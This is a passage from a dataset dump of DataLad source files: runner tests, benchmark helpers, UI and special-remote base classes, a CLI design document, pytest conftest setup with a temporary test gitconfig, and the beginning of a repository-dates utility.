protocol=TestProtocol, stdin=stdin_queue):\n if i > 10:\n stdin_queue.put(b\"exit(0)\\n\")\n stdin_queue.put(None)\n else:\n stdin_queue.put(f\"print({i}*{i})\\n\".encode())\n i += 1\n\n\ndef test_post_pipe_callbacks() -> None:\n # Expect that the process_exited and connection_lost callbacks\n # are also called in a GeneratorMixIn protocol\n class TestPostPipeProtocol(GeneratorMixIn, StdOutErrCapture):\n def __init__(self) -> None:\n GeneratorMixIn.__init__(self)\n StdOutErrCapture.__init__(self)\n\n def process_exited(self) -> None:\n self.send_result(1)\n 
self.send_result(2)\n\n def connection_lost(self, exc: Optional[BaseException]) -> None:\n self.send_result(3)\n self.send_result(4)\n\n runner = WitlessRunner()\n results = list(runner.run(cmd=[\"echo\", \"a\"], protocol=TestPostPipeProtocol))\n assert_equal(results, [1, 2, 3, 4])\n\n\ndef test_file_number_activity_detection() -> None:\n # Expect an output queue that just has the process exit notification.\n # empty output queue without active threads\n # waits for the process and progresses the generator state\n # to `_ResultGenerator.GeneratorState.process_exited`.\n class TestFNADProtocol(GeneratorMixIn, NoCapture):\n def __init__(self) -> None:\n GeneratorMixIn.__init__(self)\n NoCapture.__init__(self)\n\n def process_exited(self) -> None:\n self.send_result(3)\n\n def connection_lost(self, exc: Optional[BaseException]) -> None:\n self.send_result(4)\n\n wl_runner = WitlessRunner()\n result_generator = wl_runner.run(cmd=[\"echo\", \"a\"], protocol=TestFNADProtocol)\n assert isinstance(result_generator, _ResultGenerator)\n\n runner = result_generator.runner\n output_queue = runner.output_queue\n assert len(result_generator.runner.active_file_numbers) == 1\n while runner.should_continue():\n runner.process_queue()\n\n # Expect process exited and connection lost to be called.\n assert_equal(result_generator.send(None), 3)\n assert_equal(result_generator.send(None), 4)\n assert_raises(StopIteration, result_generator.send, None)\n\n\ndef test_failing_process():\n class TestProtocol(GeneratorMixIn, NoCapture):\n def __init__(self) -> None:\n GeneratorMixIn.__init__(self)\n NoCapture.__init__(self)\n\n try:\n for _ in run_command(py2cmd(\"exit(1)\"),\n protocol=TestProtocol,\n stdin=None):\n pass\n assert_equal(1, 2)\n except CommandError:\n return\n assert_equal(2, 3)\n" }, { "alpha_fraction": 0.5930588245391846, "alphanum_fraction": 0.603488564491272, "avg_line_length": 33.3271598815918, "blob_id": "e58338da9a02065edbb68385f87caa97ca00f16a", "content_id": "5f2620d295d35a77a0f896fba326e6834ed58b3b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5561, "license_type": "permissive", "max_line_length": 103, "num_lines": 162, "path": "/benchmarks/common.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Helpers for benchmarks of DataLad\"\"\"\n\nimport os\nimport sys\nimport tarfile\nimport tempfile\nimport timeit\nimport os.path as op\nfrom glob import glob\n\nfrom datalad.utils import (\n getpwd,\n get_tempfile_kwargs,\n rmtree,\n)\n\nfrom datalad.api import (\n Dataset,\n create_test_dataset,\n)\n\n############\n# Monkey patches\n\n# Robust is_interactive. 
Should be not needed since 0.11.4\n# https://github.com/datalad/datalad/pull/3268\ndef _is_stream_tty(stream):\n try:\n # TODO: check on windows if hasattr check would work correctly and\n # add value:\n return stream.isatty()\n except ValueError as exc:\n # Who knows why it is a ValueError, but let's try to be specific\n # If there is a problem with I/O - non-interactive, otherwise reraise\n if \"I/O\" in str(exc):\n return False\n raise\n\n\ndef is_interactive():\n \"\"\"Return True if all in/outs are tty\"\"\"\n return all(_is_stream_tty(s) for s in (sys.stdin, sys.stdout, sys.stderr))\n\n\nclass SuprocBenchmarks(object):\n # manually set a number since otherwise takes way too long!\n # see https://github.com/spacetelescope/asv/issues/497\n #number = 3\n # although seems to work ok with a timer which accounts for subprocesses\n\n # custom timer so we account for subprocess times\n timer = timeit.default_timer\n\n _monkey_patched = False\n\n def __init__(self):\n if not self._monkey_patched:\n # monkey patch things if needed\n # ASV started to close one of the std streams since some point\n # which caused our is_interactive to fail. We need to provide\n # more robust version\n from datalad.support.external_versions import external_versions\n # comparing to 0.12.1 since the returned version is \"loose\"\n # so fails correctly identify rc as pre .0\n if external_versions['datalad'] < '0.12.1':\n from datalad import utils\n from datalad.api import ls\n utils.is_interactive = is_interactive\n ls.is_interactive = is_interactive\n SuprocBenchmarks._monkey_patched = True\n self.remove_paths = []\n\n def _cleanup(self):\n if not self.remove_paths:\n return # Nothing TODO\n self.log(\"Cleaning up %d paths\", len(self.remove_paths))\n while self.remove_paths:\n path = self.remove_paths.pop()\n if op.lexists(path):\n rmtree(path)\n\n def teardown(self):\n self._cleanup()\n\n def __del__(self):\n # We will at least try\n try:\n self._cleanup()\n except:\n pass\n\n def log(self, msg, *args):\n \"\"\"Consistent benchmarks logging\"\"\"\n print(\"BM: \"+ str(msg % tuple(args)))\n\n\nclass SampleSuperDatasetBenchmarks(SuprocBenchmarks):\n \"\"\"\n Setup a sample hierarchy of datasets to be used\n \"\"\"\n\n timeout = 3600\n # need to assure that we are working in a different repository now\n # see https://github.com/datalad/datalad/issues/1512\n # might not be sufficient due to side effects between tests and\n # thus getting into the same situation\n ds_count = 0\n\n # Creating in CWD so things get removed when ASV is done\n # https://asv.readthedocs.io/en/stable/writing_benchmarks.html\n # that is where it would be run and cleaned up after\n\n dsname = 'testds1'\n tarfile = 'testds1.tar'\n\n def setup_cache(self):\n ds_path = create_test_dataset(\n self.dsname\n , spec='2/-2/-2'\n , seed=0\n )[0]\n self.log(\"Setup cache ds path %s. CWD: %s\", ds_path, getpwd())\n # Will store into a tarfile since otherwise install -r is way too slow\n # to be invoked for every benchmark\n # Store full path since apparently setup is not ran in that directory\n self.tarfile = op.realpath(SampleSuperDatasetBenchmarks.tarfile)\n with tarfile.open(self.tarfile, \"w\") as tar:\n # F.CK -- Python tarfile can't later extract those because key dirs are\n # read-only. 
For now just a workaround - make it all writeable\n from datalad.utils import rotree\n rotree(self.dsname, ro=False, chmod_files=False)\n tar.add(self.dsname, recursive=True)\n rmtree(self.dsname)\n\n def setup(self):\n self.log(\"Setup ran in %s, existing paths: %s\", getpwd(), glob('*'))\n\n tempdir = tempfile.mkdtemp(\n **get_tempfile_kwargs({}, prefix=\"bm\")\n )\n self.remove_paths.append(tempdir)\n with tarfile.open(self.tarfile) as tar:\n # note: not a concern for CVE-2007-4559 since we are the ones mastering\n # content for the tar here. See https://github.com/datalad/datalad/pull/7104\n # for more information.\n tar.extractall(tempdir)\n\n # TODO -- remove this abomination after https://github.com/datalad/datalad/issues/1512 is fixed\n epath = op.join(tempdir, 'testds1')\n epath_unique = epath + str(self.__class__.ds_count)\n os.rename(epath, epath_unique)\n self.__class__.ds_count += 1\n self.ds = Dataset(epath_unique)\n self.repo = self.ds.repo\n self.log(\"Finished setup for %s\", tempdir)\n" }, { "alpha_fraction": 0.5180374979972839, "alphanum_fraction": 0.5216450095176697, "avg_line_length": 31.23255729675293, "blob_id": "e6e4b76e42e6fa71092373b7c5f2337205af6f00", "content_id": "5ba85e7c47b6af53e305bf35cd88876227249823", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1386, "license_type": "permissive", "max_line_length": 87, "num_lines": 43, "path": "/datalad/ui/base.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Base classes for UI\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom abc import ABCMeta, abstractmethod\n\nfrom ..utils import auto_repr\n\n\n@auto_repr\nclass InteractiveUI(object, metaclass=ABCMeta):\n \"\"\"Semi-abstract class for interfaces to implement interactive UI\"\"\"\n\n @abstractmethod\n def question(self, text,\n title=None, choices=None,\n default=None,\n hidden=False,\n repeat=None):\n pass\n\n def yesno(self, *args, **kwargs):\n # Provide some default sugaring\n default = kwargs.pop('default', None)\n if default is not None:\n if default in {True}:\n default = 'yes'\n elif default in {False}:\n default = 'no'\n kwargs['default'] = default\n response = self.question(*args, choices=['yes', 'no'], **kwargs).rstrip('\\n')\n assert response in {'yes', 'no'}, \"shouldn't happen; question() failed\"\n return response == 'yes'\n" }, { "alpha_fraction": 0.7429801821708679, "alphanum_fraction": 0.7467240691184998, "avg_line_length": 39.462120056152344, "blob_id": "f48c3712146e84c84125ec98387cacf7208c5dde", "content_id": "6f5ce023aa0b09bd4fc5312718a3be6298d291eb", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5342, "license_type": "permissive", "max_line_length": 79, "num_lines": 132, "path": "/docs/source/design/cli.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_cli:\n\n**********************\nCommand line interface\n**********************\n\n.. 
topic:: Specification scope and status\n\n This incomplete specification describes the current implementation.\n\nThe command line interface (CLI) implementation is located at ``datalad.cli``.\nIt provides a console entry point that automatically constructs an\n``argparse``-based command line parser, which is used to make adequately\nparameterized calls to the targeted command implementations. It also performs\nerror handling. The CLI automatically supports all commands, regardless of\nwhether they are provided by the core package, or by extensions. It only\nrequires them to be discoverable via the respective extension entry points,\nand to implement the standard :class:`datalad.interface.base.Interface`.\n\n\nBasic workflow of a command line based command execution\n========================================================\n\nThe functionality of the main command line entrypoint described here is\nimplemented in ``datalad.cli.main``.\n\n1. Construct an ``argparse`` parser.\n\n - this is happening with inspection of the actual command line arguments\n in order to avoid needless processing\n\n - when insufficient arguments or other errors are detected, the CLI will\n fail informatively already at this stage\n\n2. Detect argument completions events, and utilize the parser in a optimized\n fashion for this purpose.\n\n3. Determine the to-be-executed command from the given command line arguments.\n\n4. Read any configuration overrides from the command line arguments.\n\n5. Change the process working directory, if requested.\n\n6. Execute the target command in one of two modes:\n\n a. With a basic exception handler\n\n b. With an exception hook setup that enables dropping into a debugger\n for any exception that reaches the command line ``main()`` routine.\n\n7. Unless a debugger is utilized, five error categories are distinguished\n (in the order given below):\n\n 1. Insufficient arguments (exit code 2)\n\n A command was called with inadequate or incomplete parameters.\n\n 2. Incomplete results (exit code 1)\n\n While processing an error occurred.\n\n 3. A specific internal shell command execution failed (exit code relayed\n from underlying command)\n\n The error is reported, as if the command would have been executed\n directly in the command line. Its output is written to the ``stdout``,\n ``stderr`` streams, and the exit code of the DataLad process matches\n the exit code of the underlying command.\n\n 4. Keyboard interrupt (exit code 3)\n\n The process was interrupted by the equivalent of a user hitting\n ``Ctrl+C``.\n\n 5. Any other error/exception.\n\n\nCommand parser construction by ``Interface`` inspection\n=======================================================\n\nThe parser setup described here is implemented in ``datalad.cli.parser``.\n\nA dedicated sub-parser for any relevant DataLad command is constructed. For\nnormal execution use cases, only a single subparser for the target command\nwill be constructed for speed reasons. However, when the command line help\nsystem is requested (``--help``) subparsers for all commands (including\nextensions) are constructed. This can take a considerable amount of time\nthat grows with the number of installed extensions.\n\nThe information necessary to configure a subparser for a DataLad command is\ndetermined by inspecting the respective\n:class:`~datalad.interface.base.Interface` class for that command, and reusing\nindividual components for the parser. 
This includes:\n\n- the class docstring\n\n- a ``_params_`` member with a dict of parameter definitions\n\n- a ``_examples_`` member, with a list of example definitions\n\nAll docstrings used for the parser setup will be processed by applying a\nset of rules to make them more suitable for the command line environment.\nThis includes the processing of ``CMD`` markup macros, and stripping their\n``PYTHON`` counter parts. Parameter constraint definition descriptions\nare also altered to exclude Python-specific idioms that have no relevance\non the command line (e.g., the specification of ``None`` as a default).\n\n\nCLI-based execution of ``Interface`` command\n============================================\n\nThe execution handler described here is implemented in ``datalad.cli.exec``.\n\nOnce the main command line entry point determine that a command shall be\nexecuted, it triggers a handler function that was assigned and parameterized\nwith the underlying command :class:`~datalad.interface.base.Interface` during\nparser construction. At the time of execution, this handler is given the result\nof ``argparse``-based command line argument parsing (i.e., a ``Namespace``\ninstance).\n\nFrom this parser result, the handler constructs positional and keyword\narguments for the respective ``Interface.__call__()`` execution. It does\nnot only process command-specific arguments, but also generic arguments,\nsuch as those for result filtering and rendering, which influence the central\nprocessing of result recorded yielded by a command.\n\nIf an underlying command returns a Python generator it is unwound to trigger\nthe respective underlying processing. The handler performs no error handling.\nThis is left to the main command line entry point.\n\n" }, { "alpha_fraction": 0.5954142212867737, "alphanum_fraction": 0.5966469645500183, "avg_line_length": 36.55555725097656, "blob_id": "17b625cecbc81f5b269cf9b9514d6df522b7f921", "content_id": "f232d5b87002d8c83adab45d1e37b280d215bf68", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4056, "license_type": "permissive", "max_line_length": 79, "num_lines": 108, "path": "/datalad/customremotes/__init__.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Support of custom remotes (e.g. 
extraction from archives)\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n__all__ = ['RemoteError', 'SpecialRemote']\n\nfrom annexremote import (\n ProtocolError,\n SpecialRemote as _SpecialRemote,\n RemoteError as _RemoteError,\n)\nfrom datalad.support.exceptions import format_exception_with_cause\nfrom datalad.ui import ui\n\n\nclass RemoteError(_RemoteError):\n def __str__(self):\n # this is a message given to remote error, if any\n exc_str = super().__str__()\n # this is the cause ala `raise from`\n exc_cause = getattr(self, '__cause__', None)\n if exc_cause:\n # if we have a cause, collect the cause all the way down\n # we can do quite some chaining\n exc_cause = format_exception_with_cause(exc_cause)\n if exc_str and exc_cause:\n # with have the full picture\n msg = f'{exc_str} -caused by- {exc_cause}'\n elif exc_str and not exc_cause:\n # only a custom message\n msg = exc_str\n elif not exc_str and exc_cause:\n # only the cause\n msg = exc_cause\n else:\n # nothing, shame!\n msg = 'exception with unknown cause'\n # prevent multiline messages, they would be swallowed\n # or kill the protocol\n return msg.replace('\\n', '\\\\n')\n\n\nclass SpecialRemote(_SpecialRemote):\n \"\"\"Common base class for all of DataLad's special remote implementations\"\"\"\n\n def __init__(self, annex):\n super(SpecialRemote, self).__init__(annex=annex)\n # instruct annex backend UI to use this remote\n if ui.backend == 'annex':\n ui.set_specialremote(self)\n\n def message(self, msg, type='debug'):\n handler = dict(\n debug=self.annex.debug,\n info=self.annex.info,\n error=self.annex.error,\n ).get(type, self.annex.debug)\n\n # ensure that no multiline messages are sent, they would cause a\n # protocol error\n msg = msg.replace('\\n', '\\\\n')\n\n try:\n handler(msg)\n except ProtocolError:\n # INFO not supported by annex version.\n # If we can't have an actual info message, at least have a\n # debug message.\n self.annex.debug(msg)\n\n def send_progress(self, progress):\n \"\"\"Indicates the current progress of the transfer (in bytes).\n\n May be repeated any number of times during the transfer process.\n\n Too frequent updates are wasteful but bear in mind that this is used\n both to display a progress meter for the user, and for\n ``annex.stalldetection``. 
So, sending an update on each 1% of the file\n may not be frequent enough, as it could appear to be a stall when\n transferring a large file.\n\n Parameters\n ----------\n progress : int\n The current progress of the transfer in bytes.\n \"\"\"\n # This method is called by AnnexSpecialRemoteProgressBar through an\n # obscure process that involves multiple layers of abstractions for\n # UIs, providers, downloaders, progressbars, which is only happening\n # within the environment of a running special remote process though\n # a combination of circumstances.\n #\n # The main purpose of this method is to have a place to leave this\n # comment within the code base of the special remotes, in order to\n # aid future souls having to sort this out.\n # (and to avoid having complex code make direct calls to internals\n # of this class, making things even more complex)\n self.annex.progress(progress)\n" }, { "alpha_fraction": 0.5562440156936646, "alphanum_fraction": 0.5595805644989014, "avg_line_length": 27.73972511291504, "blob_id": "8c78ced98100b3556b21297345f01f8364e06398", "content_id": "5ad1f57be7223bb6edf294f524e908e8a3093683", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2098, "license_type": "permissive", "max_line_length": 87, "num_lines": 73, "path": "/datalad/core/local/repo.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\" Core repository-related functionality\n\n\"\"\"\n\nfrom datalad.support.exceptions import (\n InvalidGitRepositoryError,\n InvalidAnnexRepositoryError,\n NoSuchPathError,\n)\n\nimport logging\nlgr = logging.getLogger('datalad.core.local.repo')\n\n__all__ = [\"repo_from_path\"]\n\n\ndef repo_from_path(path):\n \"\"\"Get a Repo instance from a path.\n\n Parameters\n ----------\n path : path-like\n Root path of the repository.\n\n Returns\n -------\n Repo\n Repo instance matching the type of the repository at path.\n\n Raises\n ------\n ValueError\n If no repository could be found at the path, or if its type could not\n be determined.\n \"\"\"\n # keep the imports local for now until it is clearer what the module setup\n # will be\n from datalad.support.gitrepo import GitRepo\n from datalad.support.annexrepo import AnnexRepo\n\n repo = None\n for cls, ckw, kw in (\n # Non-initialized is okay. 
We want to figure the correct instance\n # to represent what's there - that's it.\n (AnnexRepo, {'allow_noninitialized': True}, {'init': False}),\n (GitRepo, {}, {})\n ):\n if not cls.is_valid_repo(path, **ckw):\n continue\n\n try:\n lgr.log(5, \"Detected %s at %s\", cls, path)\n repo = cls(path, create=False, **kw)\n break\n except (InvalidGitRepositoryError, NoSuchPathError,\n InvalidAnnexRepositoryError) as exc:\n lgr.log(\n 5,\n \"Ignore exception after inappropriate repository type guess: \"\n \"%s\", exc)\n\n if repo is None:\n raise ValueError('No repository at {}'.format(path))\n\n return repo\n" }, { "alpha_fraction": 0.6078120470046997, "alphanum_fraction": 0.612868070602417, "avg_line_length": 37.5, "blob_id": "4782f784809d8ba5e7303069d67f765417859186", "content_id": "d4e41cb670e228154f193b744d4f87d00679c7b4", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10087, "license_type": "permissive", "max_line_length": 111, "num_lines": 262, "path": "/datalad/conftest.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import logging\nimport os\nimport re\nfrom contextlib import ExitStack\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom datalad.support.exceptions import CapturedException\nfrom datalad.utils import (\n get_encoding_info,\n get_envvars_info,\n get_home_envvars,\n)\n\nfrom . import (\n cfg,\n ssh_manager,\n)\nfrom .log import lgr\n\n_test_states = {}\n\n# handle to an HTTP server instance that is used as part of the tests\ntest_http_server = None\n\[email protected](autouse=True, scope=\"session\")\ndef setup_package():\n import tempfile\n from pathlib import Path\n\n from datalad import consts\n from datalad.support.annexrepo import AnnexRepo\n from datalad.support.cookies import cookies_db\n from datalad.support.external_versions import external_versions\n from datalad.tests import _TEMP_PATHS_GENERATED\n from datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n DEFAULT_REMOTE,\n OBSCURE_FILENAME,\n HTTPPath,\n rmtemp,\n )\n from datalad.ui import ui\n from datalad.utils import (\n make_tempfile,\n on_osx,\n )\n\n if on_osx:\n # enforce honoring TMPDIR (see gh-5307)\n tempfile.tempdir = os.environ.get('TMPDIR', tempfile.gettempdir())\n\n # Use unittest's patch instead of pytest.MonkeyPatch for compatibility with\n # old pytests\n with ExitStack() as m:\n m.enter_context(patch.object(consts, \"DATASETS_TOPURL\", 'https://datasets-tests.datalad.org/'))\n m.enter_context(patch.dict(os.environ, {'DATALAD_DATASETS_TOPURL': consts.DATASETS_TOPURL}))\n\n m.enter_context(\n patch.dict(\n os.environ,\n {\n \"GIT_CONFIG_PARAMETERS\":\n \"'init.defaultBranch={}' 'clone.defaultRemoteName={}'\"\n .format(DEFAULT_BRANCH, DEFAULT_REMOTE)\n }\n )\n )\n cred_cfg = cfg.obtain('datalad.tests.credentials')\n if cred_cfg == 'plaintext':\n m.enter_context(\n patch.dict(\n os.environ,\n {\n 'PYTHON_KEYRING_BACKEND':\n 'keyrings.alt.file.PlaintextKeyring'\n }\n )\n )\n elif cred_cfg == 'system':\n pass\n else:\n raise ValueError(cred_cfg)\n\n def prep_tmphome():\n # re core.askPass:\n # Don't let git ask for credentials in CI runs. Note, that this variable\n # technically is not a flag, but an executable (which is why name and value\n # are a bit confusing here - we just want a no-op basically). 
The environment\n # variable GIT_ASKPASS overwrites this, but neither env var nor this config\n # are supported by git-credential on all systems and git versions (most recent\n # ones should work either way, though). Hence use both across CI builds.\n gitconfig = \"\"\"\\\n[user]\n name = DataLad Tester\n email = [email protected]\n[core]\n\taskPass =\n[datalad \"log\"]\n exc = 1\n[annex \"security\"]\n\t# from annex 6.20180626 file:/// and http://localhost access isn't\n\t# allowed by default\n\tallowed-url-schemes = http https file\n\tallowed-http-addresses = all\n[protocol \"file\"]\n # since git 2.38.1 cannot by default use local clones for submodules\n # https://github.blog/2022-10-18-git-security-vulnerabilities-announced/#cve-2022-39253\n allow = always\n\"\"\" + os.environ.get('DATALAD_TESTS_GITCONFIG', '').replace('\\\\n', os.linesep)\n # TODO: split into a function + context manager\n with make_tempfile(mkdir=True) as new_home:\n pass\n # register for clean-up on exit\n _TEMP_PATHS_GENERATED.append(new_home)\n\n # populate default config\n new_home = Path(new_home)\n new_home.mkdir(parents=True, exist_ok=True)\n cfg_file = new_home / '.gitconfig'\n cfg_file.write_text(gitconfig)\n return new_home, cfg_file\n\n if external_versions['cmd:git'] < \"2.32\":\n # To overcome pybuild overriding HOME but us possibly wanting our\n # own HOME where we pre-setup git for testing (name, email)\n if 'GIT_HOME' in os.environ:\n m.enter_context(patch.dict(os.environ, {'HOME': os.environ['GIT_HOME']}))\n else:\n # we setup our own new HOME, the BEST and HUGE one\n new_home, _ = prep_tmphome()\n m.enter_context(patch.dict(os.environ, get_home_envvars(new_home)))\n else:\n _, cfg_file = prep_tmphome()\n m.enter_context(patch.dict(os.environ, {'GIT_CONFIG_GLOBAL': str(cfg_file)}))\n\n # Re-load ConfigManager, since otherwise it won't consider global config\n # from new $HOME (see gh-4153\n cfg.reload(force=True)\n\n # datalad.locations.sockets has likely changed. Discard any cached values.\n ssh_manager._socket_dir = None\n\n # To overcome pybuild by default defining http{,s}_proxy we would need\n # to define them to e.g. 
empty value so it wouldn't bother touching them.\n # But then haskell libraries do not digest empty value nicely, so we just\n # pop them out from the environment\n for ev in ('http_proxy', 'https_proxy'):\n if ev in os.environ and not (os.environ[ev]):\n lgr.debug(\"Removing %s from the environment since it is empty\", ev)\n os.environ.pop(ev)\n\n # Prevent interactive credential entry (note \"true\" is the command to run)\n # See also the core.askPass setting above\n m.enter_context(patch.dict(os.environ, {'GIT_ASKPASS': 'true'}))\n\n # Set to non-interactive UI\n _test_states['ui_backend'] = ui.backend\n # obtain() since that one consults for the default value\n ui.set_backend(cfg.obtain('datalad.tests.ui.backend'))\n\n # in order to avoid having to fiddle with rather uncommon\n # file:// URLs in the tests, have a standard HTTP server\n # that serves an 'httpserve' directory in the test HOME\n # the URL will be available from datalad.test_http_server.url\n\n global test_http_server\n # Start the server only if not running already\n # Relevant: we have test_misc.py:test_test which runs datalad.test but\n # not doing teardown, so the original server might never get stopped\n if test_http_server is None:\n serve_path = tempfile.mkdtemp(\n dir=cfg.get(\"datalad.tests.temp.dir\"),\n prefix='httpserve',\n )\n test_http_server = HTTPPath(serve_path)\n test_http_server.start()\n _TEMP_PATHS_GENERATED.append(serve_path)\n\n yield\n\n lgr.debug(\"Printing versioning information collected so far\")\n # Query for version of datalad, so it is included in ev.dumps below - useful while\n # testing extensions where version of datalad might differ in the environment.\n external_versions['datalad']\n print(external_versions.dumps(query=True))\n try:\n print(\"Obscure filename: str=%s repr=%r\"\n % (OBSCURE_FILENAME.encode('utf-8'), OBSCURE_FILENAME))\n except UnicodeEncodeError as exc:\n ce = CapturedException(exc)\n print(\"Obscure filename failed to print: %s\" % ce)\n def print_dict(d):\n return \" \".join(\"%s=%r\" % v for v in d.items())\n print(\"Encodings: %s\" % print_dict(get_encoding_info()))\n print(\"Environment: %s\" % print_dict(get_envvars_info()))\n\n if os.environ.get('DATALAD_TESTS_NOTEARDOWN'):\n return\n\n ui.set_backend(_test_states['ui_backend'])\n\n if test_http_server:\n test_http_server.stop()\n test_http_server = None\n else:\n lgr.debug(\"For some reason global http_server was not set/running, thus not stopping\")\n\n if len(_TEMP_PATHS_GENERATED):\n msg = \"Removing %d dirs/files: %s\" % (len(_TEMP_PATHS_GENERATED), ', '.join(_TEMP_PATHS_GENERATED))\n else:\n msg = \"Nothing to remove\"\n lgr.debug(\"Teardown tests. \" + msg)\n for path in _TEMP_PATHS_GENERATED:\n rmtemp(str(path), ignore_errors=True)\n\n # Re-establish correct global config after changing $HOME.\n # Might be superfluous, since after teardown datalad.cfg shouldn't be\n # needed. However, maintaining a consistent state seems a good thing\n # either way.\n cfg.reload(force=True)\n\n ssh_manager._socket_dir = None\n\n cookies_db.close()\n\n\[email protected](autouse=True)\ndef capture_logs(caplog, monkeypatch):\n DATALAD_LOG_LEVEL = os.environ.get('DATALAD_LOG_LEVEL', None)\n if DATALAD_LOG_LEVEL is None:\n # very very silent. 
Tests introspecting logs should use\n # swallow_logs(new_level=...)\n caplog.set_level(100, lgr.name)\n # And we should also set it within environ so underlying commands also\n # stay silent\n monkeypatch.setenv('DATALAD_LOG_LEVEL', '100')\n\n\ndef pytest_ignore_collect(path):\n # Skip old nose code and the tests for it:\n # Note, that this is not only about executing tests but also importing those\n # files to begin with.\n if path.basename == \"test_tests_utils.py\":\n return True\n if path.basename == \"utils.py\" and \\\n path.dirpath().basename == \"tests\" and \\\n path.dirpath().dirpath().basename == \"datalad\":\n return True\n # When pytest is told to run doctests, by default it will import every\n # source file in its search, but a number of datalad source file have\n # undesirable side effects when imported. This hook should ensure that\n # only `test_*.py` files and `*.py` files containing doctests are imported\n # during test collection.\n if path.basename.startswith(\"test_\") or path.check(dir=1):\n return False\n if path.ext != \".py\":\n return True\n return not any(\n re.match(r\"^\\s*>>>\", ln) for ln in path.read_text(\"utf-8\").splitlines()\n )\n" }, { "alpha_fraction": 0.5802538990974426, "alphanum_fraction": 0.5842971205711365, "avg_line_length": 33.983551025390625, "blob_id": "789a763a7dd20b3e953e70b49c304e1a40d803b4", "content_id": "4fa977d48b737c3c6df49cd72a365a3f34636069", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10635, "license_type": "permissive", "max_line_length": 87, "num_lines": 304, "path": "/datalad/support/repodates.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Utilities for checking repository dates.\n\"\"\"\n\nimport logging\nimport operator\nimport re\nimport time\n\n\nfrom datalad.log import log_progress\nfrom datalad.support.exceptions import CommandError\nfrom datalad.support.gitrepo import GitRepo\n\nlgr = logging.getLogger('datalad.repodates')\n\n\ndef _cat_blob(repo, obj, bad_ok=False):\n \"\"\"Call `git cat-file blob OBJ`.\n\n Parameters\n ----------\n repo : GitRepo\n obj : str\n Blob object.\n bad_ok : boolean, optional\n Don't fail if `obj` doesn't name a known blob.\n\n Returns\n -------\n Blob's content (str) or None if `obj` is not and `bad_ok` is true.\n \"\"\"\n if bad_ok:\n kwds = {\"expect_fail\": True, \"expect_stderr\": True}\n else:\n kwds = {}\n\n try:\n out_cat = repo.call_git([\"cat-file\", \"blob\", obj], read_only=True,\n **kwds)\n except CommandError as exc:\n if bad_ok and \"bad file\" in exc.stderr:\n out_cat = None\n else:\n raise\n return out_cat\n\n\ndef branch_blobs(repo, branch):\n \"\"\"Get all blobs for `branch`.\n\n Parameters\n ----------\n repo : GitRepo\n branch : str\n\n Returns\n -------\n A generator object that returns (hexsha, content, file name) for each blob\n in `branch`. 
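For illustration, the doctest screening performed by the `pytest_ignore_collect` hook above amounts to looking for an interactive-prompt line; a minimal sketch (the `sample` module source below is made up):

    import re

    # fabricated module source containing a single doctest
    sample = 'def f():\n    """Return one.\n\n    >>> f()\n    1\n    """\n    return 1\n'
    # same check as in the hook: any line starting with the ">>>" prompt
    has_doctest = any(re.match(r"^\s*>>>", ln) for ln in sample.splitlines())
    print(has_doctest)  # True, so such a file would be kept for doctest collection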
